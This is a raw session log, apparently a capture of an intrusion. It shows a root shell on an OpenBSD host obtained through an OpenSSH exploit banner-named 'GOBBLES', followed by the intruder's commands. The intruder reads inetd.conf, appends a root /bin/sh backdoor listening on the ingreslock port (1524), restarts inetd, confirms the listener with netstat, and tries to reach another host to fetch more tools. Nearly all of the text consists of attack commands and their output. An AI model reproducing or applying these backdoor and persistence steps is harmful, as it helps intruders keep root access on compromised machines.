SSH-1.99-OpenSSH_3.0
SSH-2.0-GOBBLES
GGGGO*GOBBLE*
uname -a;id
OpenBSD pufferfish 3.0 GENERIC#94 i386
uid=0(root) gid=0(wheel) groups=0(wheel)
cat /etc/inetd.conf
# $OpenBSD: inetd.conf,v 1.41 2001/09/25 01:00:21 deraadt Exp $
#
# Internet server configuration database
#
# define *both* IPv4 and IPv6 entries for dual-stack support.
#
#ftp stream tcp nowait root /usr/libexec/ftpd ftpd -US
#ftp stream tcp6 nowait root /usr/libexec/ftpd ftpd -US
#telnet stream tcp nowait root /usr/libexec/telnetd telnetd -k
#telnet stream tcp6 nowait root /usr/libexec/telnetd telnetd -k
#shell stream tcp nowait root /usr/libexec/rshd rshd -L
#shell stream tcp6 nowait root /usr/libexec/rshd rshd -L
#login stream tcp nowait root /usr/libexec/rlogind rlogind
#login stream tcp6 nowait root /usr/libexec/rlogind rlogind
#exec stream tcp nowait root /usr/libexec/rexecd rexecd
#uucpd stream tcp nowait root /usr/libexec/uucpd uucpd
#finger stream tcp nowait nobody /usr/libexec/fingerd fingerd -lsm
#finger stream tcp6 nowait nobody /usr/libexec/fingerd fingerd -lsm
ident stream tcp nowait nobody /usr/libexec/identd identd -el
ident stream tcp6 nowait nobody /usr/libexec/identd identd -el
#tftp dgram udp wait root /usr/libexec/tftpd tftpd -s /tftpboot
comsat dgram udp wait root /usr/libexec/comsat comsat
comsat dgram udp6 wait root /usr/libexec/comsat comsat
#ntalk dgram udp wait root /usr/libexec/ntalkd ntalkd
#bootps dgram udp wait root /usr/sbin/bootpd bootpd
#pop3 stream tcp nowait root /usr/sbin/popa3d popa3d
# Internal services
#echo stream tcp nowait root internal
#echo stream tcp6 nowait root internal
#discard stream tcp nowait root internal
#discard stream tcp6 nowait root internal
#chargen stream tcp nowait root internal
#chargen stream tcp6 nowait root internal
daytime stream tcp nowait root internal
daytime stream tcp6 nowait root internal
time stream tcp nowait root internal
time stream tcp6 nowait root internal
#echo dgram udp wait root internal
#echo dgram udp6 wait root internal
#discard dgram udp wait root internal
#discard dgram udp6 wait root internal
#chargen dgram udp wait root internal
#chargen dgram udp6 wait root internal
#daytime dgram udp wait root internal
#daytime dgram udp6 wait root internal
#time dgram udp wait root internal
#time dgram udp6 wait root internal
# Kerberos authenticated services
#klogin stream tcp nowait root /usr/libexec/rlogind rlogind -k
#eklogin stream tcp nowait root /usr/libexec/rlogind rlogind -kx
#kshell stream tcp nowait root /usr/libexec/rshd rshd -k
#ekshell stream tcp nowait root /usr/libexec/rshd rshd -Lk
#ekshell2 stream tcp nowait root /usr/libexec/rshd rshd -Lk
#kauth stream tcp nowait root /usr/libexec/kauthd kauthd
# Encrypted X connections
#kx stream tcp nowait root /usr/X11R6/bin/kxd kxd
# RPC based services
rstatd/1-3 dgram rpc/udp wait root /usr/libexec/rpc.rstatd rpc.rstatd
rusersd/1-3 dgram rpc/udp wait root /usr/libexec/rpc.rusersd rpc.rusersd
#walld/1 dgram rpc/udp wait root /usr/libexec/rpc.rwalld rpc.rwalld
#sprayd/1 dgram rpc/udp wait root /usr/libexec/rpc.sprayd rpc.sprayd
#rquotad/1 dgram rpc/udp wait root /usr/libexec/rpc.rquotad rpc.rquotad
/bin/ksh -c echo "ingreslock stream tcp nowait root /bin/sh sh -i"/tmp/x;/usr/sbin/inetd -s /tmp/x;sleep 10;/bin/rm -f /tmp/x
inetd: illegal option -- s
usage: inetd [-R rate] [-d] [conf]
echo "ingreslock stream tcp nowait root /bin/sh sh -i"
ingreslock stream tcp nowait root /bin/sh sh -i
echo "ingreslock stream tcp nowait root /bin/sh sh -i" >> /etc/inetd.conf
killall -HUP inetd
//bin/sh: [6]: killall: not found
ps -aux
USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND
root 1735 0.0 0.1 284 208 ?? R 3:05PM 0:00.00 ps -aux
root 25892 0.0 0.2 104 452 ?? Ss Tue02PM 0:00.14 syslogd
root 13304 0.0 0.1 64 364 ?? Is Tue02PM 0:00.00 portmap
root 24196 0.0 0.6 1072 1544 ?? Ss Tue02PM 0:00.59 /usr/sbin/htt
root 10597 0.0 0.2 80 472 ?? Is Tue02PM 0:00.02 inetd
root 212 0.0 0.5 836 1328 ??
Ss Tue02PM 0:01.28 sendmail: acc
www 25404 0.0 0.6 1072 1548 ?? I Tue02PM 0:00.01 /usr/sbin/htt
www 29861 0.0 0.6 1072 1548 ?? I Tue02PM 0:00.01 /usr/sbin/htt
www 1034 0.0 0.6 1072 1548 ?? I Tue02PM 0:00.00 /usr/sbin/htt
www 10944 0.0 0.6 1072 1548 ?? I Tue02PM 0:00.00 /usr/sbin/htt
www 2344 0.0 0.6 1072 1548 ?? I Tue02PM 0:00.00 /usr/sbin/htt
root 22389 0.0 0.4 332 1148 ?? Is Tue02PM 0:00.53 /usr/sbin/ssh
root 11182 0.0 0.2 224 536 ?? Ss Tue02PM 0:00.31 cron
root 29118 0.0 0.2 44 428 C0 Is+ Tue02PM 0:00.00 /usr/libexec/
root 17521 0.0 0.2 44 428 C1 Is+ Tue02PM 0:00.00 /usr/libexec/
root 490 0.0 0.2 44 428 C2 Is+ Tue02PM 0:00.01 /usr/libexec/
root 17375 0.0 0.2 44 428 C3 Is+ Tue02PM 0:00.00 /usr/libexec/
root 4754 0.0 0.2 44 428 C5 Is+ Tue02PM 0:00.00 /usr/libexec/
megla 17905 0.0 0.4 452 1052 ?? Is 4:26PM 0:00.22 SCREEN (scree
megla 30640 0.0 0.5 828 1196 p1 Is+ 4:26PM 0:00.04 /usr/bin/bash
megla 31648 0.0 0.5 828 1196 p2 Is+ 4:26PM 0:00.05 /usr/bin/bash
root 20173 0.0 0.1 372 272 ?? I 3:00PM 0:00.24 //bin/sh
root 555 0.0 0.1 372 256 ?? S 3:03PM 0:00.25 //bin/sh
root 29679 0.0 0.1 292 144 ?? S 3:04PM 0:00.01 ping 192.168.
root 10124 0.0 0.1 372 260 ?? S 3:04PM 0:00.22 //bin/sh
root 28349 0.0 0.1 372 260 ?? S 3:05PM 0:00.00 /bin/sh
root 1 0.0 0.1 332 200 ?? Is Tue02PM 0:00.02 /sbin/init
kill -HUP 10597
ps -aux
USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND
root 23395 0.0 0.1 284 216 ?? R 3:07PM 0:00.00 ps -aux
root 25892 0.0 0.2 104 452 ?? Ss Tue02PM 0:00.14 syslogd
root 13304 0.0 0.1 64 364 ?? Is Tue02PM 0:00.00 portmap
root 24196 0.0 0.6 1072 1544 ?? Ss Tue02PM 0:00.59 /usr/sbin/htt
root 10597 0.0 0.2 88 492 ?? Is Tue02PM 0:00.02 inetd
root 212 0.0 0.5 836 1328 ?? Ss Tue02PM 0:01.28 sendmail: acc
www 25404 0.0 0.6 1072 1548 ?? I Tue02PM 0:00.01 /usr/sbin/htt
www 29861 0.0 0.6 1072 1548 ?? I Tue02PM 0:00.01 /usr/sbin/htt
www 1034 0.0 0.6 1072 1548 ?? I Tue02PM 0:00.00 /usr/sbin/htt
www 10944 0.0 0.6 1072 1548 ??
I Tue02PM 0:00.00 /usr/sbin/htt
www 2344 0.0 0.6 1072 1548 ?? I Tue02PM 0:00.00 /usr/sbin/htt
root 22389 0.0 0.4 332 1148 ?? Is Tue02PM 0:00.53 /usr/sbin/ssh
root 11182 0.0 0.2 224 536 ?? Ss Tue02PM 0:00.31 cron
root 29118 0.0 0.2 44 428 C0 Is+ Tue02PM 0:00.00 /usr/libexec/
root 17521 0.0 0.2 44 428 C1 Is+ Tue02PM 0:00.00 /usr/libexec/
root 490 0.0 0.2 44 428 C2 Is+ Tue02PM 0:00.01 /usr/libexec/
root 17375 0.0 0.2 44 428 C3 Is+ Tue02PM 0:00.00 /usr/libexec/
root 4754 0.0 0.2 44 428 C5 Is+ Tue02PM 0:00.00 /usr/libexec/
megla 17905 0.0 0.4 452 1052 ?? Is 4:26PM 0:00.22 SCREEN (scree
megla 30640 0.0 0.5 828 1196 p1 Is+ 4:26PM 0:00.04 /usr/bin/bash
megla 31648 0.0 0.5 828 1196 p2 Is+ 4:26PM 0:00.05 /usr/bin/bash
root 20173 0.0 0.1 372 272 ?? I 3:00PM 0:00.24 //bin/sh
root 555 0.0 0.1 372 260 ?? S 3:03PM 0:00.25 //bin/sh
root 29679 0.0 0.1 292 144 ?? S 3:04PM 0:00.02 ping 192.168.
root 4340 0.0 0.1 372 260 ?? S 3:05PM 0:00.23 //bin/sh
root 1 0.0 0.1 332 200 ?? Is Tue02PM 0:00.02 /sbin/init
netstat -an
Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address Foreign Address (state)
tcp 0 0 *.1524 *.* LISTEN
tcp 0 0 192.168.3.100.22 Hacker1.64916 ESTABLISHED
tcp 0 0 192.168.3.100.22 Hacker1Again.64864 FIN_WAIT_2
tcp 0 0 *.22 *.* LISTEN
tcp 0 0 127.0.0.1.587 *.* LISTEN
tcp 0 0 127.0.0.1.25 *.* LISTEN
tcp 0 0 *.37 *.* LISTEN
tcp 0 0 *.13 *.* LISTEN
tcp 0 0 *.113 *.* LISTEN
tcp 0 0 *.80 *.* LISTEN
tcp 0 0 127.0.0.1.111 *.* LISTEN
tcp 0 0 *.111 *.* LISTEN
udp 0 0 *.648 *.*
udp 0 0 *.739 *.*
udp 0 0 *.512 *.*
udp 0 0 127.0.0.1.111 *.*
udp 0 0 *.514 *.*
udp 0 0 *.111 *.*
tcp6 0 0 *.22 *.* LISTEN
tcp6 0 0 ::1.587 *.* LISTEN
tcp6 0 0 ::1.25 *.* LISTEN
tcp6 0 0 *.37 *.* LISTEN
tcp6 0 0 *.13 *.* LISTEN
tcp6 0 0 *.113 *.* LISTEN
udp6 0 0 *.512 *.*
Active UNIX domain sockets
Address Type Recv-Q Send-Q Inode Conn Refs Nextref Addr
0xe0b0b700 dgram 0 0 0x0 0xe0a97040 0x0 0xe0af4300
0xe0afc000 dgram 0 0 0x0 0xe0a97040 0x0 0xe0af43c0
0xe0ae1f00 dgram 0 0 0x0
0xe0a97040 0x0 0xe0a58280
0xe0add800 dgram 0 0 0x0 0xe0a97040 0x0 0x0
0xe0ace500 dgram 0 0 0xefb43dd4 0x0 0xe0b09fc0 0x0 /dev/log
cd /usr/libexec
mkdir nn
telnet 192.168.0.1
fetch
telnet: connect to address 192.168.0.1: Connection timed out
Trying 192.168.0.1...
//bin/sh: [14]: fetch: not found